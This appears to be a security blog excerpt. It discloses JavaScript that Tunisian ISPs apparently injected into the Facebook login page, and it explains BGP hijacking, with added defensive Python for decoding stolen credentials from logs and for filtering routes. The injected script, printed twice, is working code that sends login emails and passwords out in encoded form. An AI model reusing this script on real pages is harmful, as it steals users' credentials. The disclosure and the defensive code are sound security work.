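The same three signatures work as firewall or IDS match criteria; the point of running them over flow exports first is to learn where IPv6 already enters the network before the IPv6 filtering policy is written.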

2011 promises to be a “hot” year on the Internet scene. If your company does not have plans to support IPv6, I suggest you raise some awareness. My own plans are: speaking about IPv6 to customers and colleagues, and migrating my servers to native IPv6 connectivity instead of a tunnel.

Related sites:

Tunisia Tracks Users with JavaScript Injection?

Disclaimer: The information reported below has been translated from French to English with the approval of a friend who also released the information on his blog. His server was hit by a DoS attack. Feel free to relay the information!

When you try to access big websites like Facebook, Google or Yahoo! while connected to a Tunisian ISP, here is the code your browser receives (for Facebook in the example below):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" id="facebook">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="fr" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._is_quickling_index="";window._EagleEyeSeed="w6jw";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook est un réseau social qui vous relie à des amis, des collègues de travail, des camarades de classe ou d’autres personnes qui ont quelque chose à partager avec vous. Grâce à Facebook, vous pourrez rester en contact avec vos amis, charger un nombre illimité de photos, publier des liens et des vidéos… et faire plus ample connaissance avec les personnes que vous rencontrez." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/" />
<title>Bienvenue sur Facebook</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y6/r/TVhzFSu8Tm2.css" />

    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y-/r/zbLi6FTnPZj.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yN/r/Uuokrl6Xv3c.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/rUdGGxe1Qk1.css" />

    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y7/r/5875srnzL-I.ico" /></head>
<body>
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div><div><div><a href="/" title="Accéder à la page d&#039;accueil"><img src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Logo de Facebook" width="170" height="36" /></a><div><div><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="hAAAQ3d()" onsubmit="return Event.__inlineSubmit(this,event)"><div style="position:absolute;top:-250px"><img id="x6y7z8" src=""/></div>
<script language="javascript">
<!--
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
 var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
 var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//-->

</script><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="AOL9y" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="fr_FR" autocomplete="off" /><table cellspacing="0"><tr><td><label for="email">Adresse électronique</label></td><td><label for="pass">Mot de passe</label></td></tr><tr><td><input type="text" name="email" id="email" tabindex="1" /></td><td><input type="password" name="pass" id="pass" tabindex="2" /></td><td><label><input value="Connexion" tabindex="4" type="submit" /></label></td></tr><tr><td><input type="checkbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">Garder ma session active</label></td><td><a href="http://www.facebook.com/reset.php" rel="nofollow">Mot de passe oublié ?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="AOL9y" autocomplete="off" /></form>
</div></div></div></div><div><div><div><div>Facebook vous permet de rester en contact et d'échanger avec les personnes qui vous entourent.</div><div>&nbsp;</div></div><div><div><div><div>Inscription</div><div>C’est gratuit (et ça le restera toujours)</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>JavaScript est désactivé dans votre navigateur.</h2><p>Veuillez activer JavaScript dans votre navigateur ou installer un navigateur avec JavaScript pour pouvoir vous enregistrer sur Facebook.</p></div></noscript><div id="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return

The most interesting code is the following:

<!--
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
 var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
 var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//-->

The code is injected when you try to access the website. It was successfully tested from a proxy server located in Tunisia. This code generates a new request which looks like:

http://www.facebook.com/wo0dh3ad?q=blablablabla&u=USERNAME&p=PASSWORD

This is a fake page and the user will receive a nice “404″ error. But their credentials have already been sent in clear text. So easy to collect with another tool and build a nice list of poor users!
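From the defender's side, the same nibble encoding can be reversed to find out, from proxy logs, which accounts were captured by this kit and must be reset. This is an added example and not code from the original post; the log lines are constructed, and only the collector path quoted above is taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The injected h6h() routine turns every character into two letters:
# (high nibble + 97) and (low nibble + 97), i.e. each byte becomes a pair
# of letters in the range a..p. This function inverts that mapping.
def h6h_decode(s):
    if len(s) % 2 or any(ch not in "abcdefghijklmnop" for ch in s):
        raise ValueError("not h6h-encoded")
    out = []
    for i in range(0, len(s), 2):
        hi = ord(s[i]) - 97
        lo = ord(s[i + 1]) - 97
        out.append(chr((hi << 4) | lo))
    return "".join(out)

# Constructed proxy log lines (not real traffic). The first one carries
# user "alice" and a six-character password in h6h form.
SAMPLE_LOG = """\
GET http://www.facebook.com/wo0dh3ad?q=kdjsa&u=gbgmgjgdgf&p=hdddgdhcgfhe
GET http://www.facebook.com/home.php
GET http://www.facebook.com/wo0dh3ad?q=zzzzz&u=notencoded&p=xyz
"""

URL_RE = re.compile(r"https?://\S+")

def find_exfiltrated_credentials(log_text):
    """Return one record per request that posted h6h-encoded credentials.
    The password is decoded only to confirm the encoding; only its length
    is reported, so the output can be handed to the account owners' admins."""
    hits = []
    for line in log_text.splitlines():
        m = URL_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(0))
        qs = parse_qs(parts.query)
        if "u" not in qs or "p" not in qs:
            continue
        try:
            user = h6h_decode(qs["u"][0])
            pw_len = len(h6h_decode(qs["p"][0]))
        except ValueError:
            continue  # parameters are not nibble-encoded: not this kit
        hits.append({"path": parts.path, "user": user, "password_chars": pw_len})
    return hits
```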


Is BGP the Next Threat on Internet?

BGP for Dummies

When the Internet (ARPAnet) was invented in the seventies, its goal was to interconnect military resources using packet-based networks and to be strong enough to resist “attacks”. Losing some devices in the network could not affect the communications. Later, the same technology was re-used to build the public network that you still use today to read this article: the Internet!

But as networks became more and more interconnected and complex, it became mandatory to develop protocols to route between all of them dynamically. There are many routing protocols like RIP, OSPF and… BGP!

I’ll not fully explain BGP (“Border Gateway Protocol“) here; I’m definitely not a BGP expert, but I played a lot with it when I worked for Internet providers. To sum it up in a few words: the Internet would not exist without BGP! When you want to visit a web site, BGP decides through which pipes to send your data. Its current version is 4 (since 2006) and it is documented in RFC4271. BGP is used to exchange groups of routes (or IP address prefixes) between autonomous systems (“AS“).

A report written by a commission on United States and Chinese relations was released to the U.S. Congress a few days ago. The document reports an incident detected in April. During a few (18!) minutes, some Chinese ISPs hijacked Internet traffic. The consequences were lots of unreachable sites and services and (worse!) big security consequences in terms of confidentiality. But wait… the Internet was designed to resist attacks… Did I miss something?

In fact, BGP is just a protocol and potentially vulnerable to attacks. Countermeasures exist but are not always used by network administrators. The purpose of BGP is to exchange messages between “peers” (routers). Very simply, messages are of the type “Please note that to reach the network 1.2.3.4, you need to pass through me!” or “How do I reach network 6.7.8.9?“. All those peers build a unique routing table which contains the complete Internet address space. For your information, the table size is constantly growing:

BGP Routing Table

(Source: http://bgp.potaroo.net/)

Two Internet providers that decide to establish a BGP session set up a “peering agreement”. The peers are supposed to be trusted. A minimal configuration looks like:

  # ISP1
  router bgp 1
  neighbor 10.20.30.40 remote-as 2

  # ISP2
  router bgp 2
  neighbor 6.7.8.9 remote-as 1

But we are not in 2006 anymore: can we trust our peers? All BGP sessions are established between peers via a TCP session (on port 179). This is a first issue: all known attacks available at layer 4 can be used against BGP: session resets, floods (DDoS), MitM, etc. But more attacks can be conducted at the upper layers: injection of malicious prefixes is a common issue. The goals can be multiple:

  • Blackholing – the victim is “disconnected” from the Internet.
  • Redirection – the victim’s traffic is redirected to a malicious network.
  • Routing instability (or “dampening“) – BGP has a mechanism to detect unstable routes, and triggering it can result in network outages (like blackholing).

By default, BGP does not take care of the integrity and origin of received messages. It validates neither the route announcements made by an AS nor the AS path. Except for the “Chinese” issue reported a few days ago, such attacks are rare! But misconfigurations occur and have exactly the same impact. Often they originate from small Internet providers which don’t have a lot of experience (human errors). A well-known example is the Pakistani ISP which hijacked YouTube in 2008!

How to avoid those problems? Well, there are interesting projects like Secure BGP (or “S-BGP“). S-BGP fills the security gap by implementing new controls:

  • The BGP components (IP prefixes, AS numbers, routers and their owners) are linked to a PKI infrastructure to authenticate them.
  • Digital signatures are exchanged during BGP updates.
  • IPsec is used between peers.

It looks nice but is not easy to implement. Do the smallest ISPs have the time and internal resources to implement this? There are two other proposals: Secure Origin BGP (“soBGP“), based on a public/private key infrastructure, and Pretty Secure BGP (“psBGP”).

And don’t forget core router security. Routers are like any computer: they run an operating system, they are managed remotely by network teams and they contain sensitive data. They must be properly protected. Even in a secure BGP deployment, if your router is pwned, it could be used to send bogus BGP announcements to your peers!

If you’re interested in following BGP networks and issues, I recommend the site bgpmon.net. Very useful if you maintain your own AS or if you’d like to follow the AS of your Internet provider (always useful). BGP misconfigurations are a common issue today. To give you an idea, check out the bogon prefixes announced on the Internet! (Bogon prefixes, like RFC1918 space, must never be announced on the Internet.)
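The inbound filtering that would have caught both the bogon announcements mentioned above and a more-specific hijack of the YouTube kind, as an added example that is not part of the original post: reject bogons, cap the prefix length, and check the origin AS against a per-peer allowlist (what a prefix-list built from the peering agreement would contain). All prefixes, AS numbers and the allowlist are constructed values.

```python
import ipaddress

# Constructed policy (not from the post): ranges that must never appear in
# a routing announcement, in the spirit of the RFC1918 remark above.
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4")]

# Prefixes each remote AS is registered to originate (constructed).
ORIGIN_ALLOWED = {
    2: [ipaddress.ip_network("203.0.113.0/24")],
}

MAX_PREFIXLEN = 24  # anything longer is a de-aggregation we refuse to carry

def check_announcement(prefix, as_path, allowed=ORIGIN_ALLOWED):
    """Return None if the announcement passes, otherwise a rejection reason.
    as_path lists AS numbers from our neighbour (first) to the origin (last)."""
    net = ipaddress.ip_network(prefix, strict=False)
    if net.prefixlen > MAX_PREFIXLEN:
        return f"too specific (longer than /{MAX_PREFIXLEN})"
    if any(net.subnet_of(b) for b in BOGONS):
        return "bogon prefix"
    if not as_path:
        return "empty AS path"
    origin = as_path[-1]
    if origin not in allowed:
        return f"unknown origin AS {origin}"
    if not any(net.subnet_of(a) for a in allowed[origin]):
        return f"AS {origin} not registered for {net}"
    return None

def filter_updates(updates):
    """Split a batch of (prefix, as_path) tuples into accepted prefixes and
    a mapping of rejected prefix -> reason, as a route policy would."""
    accepted, rejected = [], {}
    for prefix, as_path in updates:
        reason = check_announcement(prefix, as_path)
        if reason is None:
            accepted.append(prefix)
        else:
            rejected[prefix] = reason
    return accepted, rejected

# Constructed UPDATEs received from neighbour AS 2: one legitimate route,
# one RFC1918 leak, one more-specific, and a route for someone else's space.
SAMPLE_UPDATES = [
    ("203.0.113.0/24", [2]),
    ("10.0.0.0/8", [2]),
    ("203.0.113.128/25", [2]),
    ("198.51.100.0/24", [2, 3]),
]
```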
